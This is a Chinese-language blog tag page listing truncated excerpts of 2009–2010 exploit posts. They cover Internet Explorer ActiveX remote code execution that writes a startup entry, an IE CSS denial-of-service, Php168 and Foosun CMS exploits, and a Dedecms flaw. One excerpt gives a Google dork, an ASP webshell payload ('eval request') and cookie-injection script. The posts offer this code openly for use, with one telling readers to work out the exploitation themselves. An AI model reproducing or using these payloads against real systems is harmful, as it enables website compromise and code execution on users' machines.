含有 0DAY 标签的文章

又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行)

date 2010年01月19日 | category 工具收集

这段代码在SP3+IE6下测试成功 测试代码: <html> <p align="left"><b><font face="Segoe Script" ReadMore

传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法))

date 2010年01月19日 | category 工具收集

这个代码会写入启动项,各位看官测试的时候注意了,不会当时生效,重启后可见效果! 测试代码: <html>   <object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object> <script language='vbscript'>   targetFile ReadMore

Internet Explorer 6/7 CSS Handling Denial of Service

date 2009年11月24日 | category 工具收集

IE6/7 CSS 处理拒绝服务 利用代码: <!-- securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML ReadMore

Php168一个很早的漏洞的EXP

date 2009年11月12日 | category 工具收集

作者:puret_t 利用代码: <?php print_r(' +---------------------------------------------------------------------------+ Php168 <= v2008 remote code execution exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by ReadMore

南方数据0DAY

date 2009年11月05日 | category 学习笔记

南方数据的0DAY,具体怎么利用各位看官自己研究吧! 代码: inurl:Shownews.asp?相关评论 发表评论: 呢称:评论 "%><%eval request("#")%><%' javascript:alert(document.cookie="id="+escape("id")) javascript:alert(document.cookie="id="+escape("111 and ReadMore

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

date 2009年10月26日 | category 学习笔记

作者:Flyh4t 影响版本: Dedecms ReadMore

风讯CMS 0DAY exploits

date 2009年10月17日 | category 学习笔记, 工具收集

把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了 <herd><title>foosun cms 0day exploits</title> </herd> <body> <% web=request("web") id=request("id") %> 关键字:会员注册step 1 of 4 step<br> <form action='' ReadMore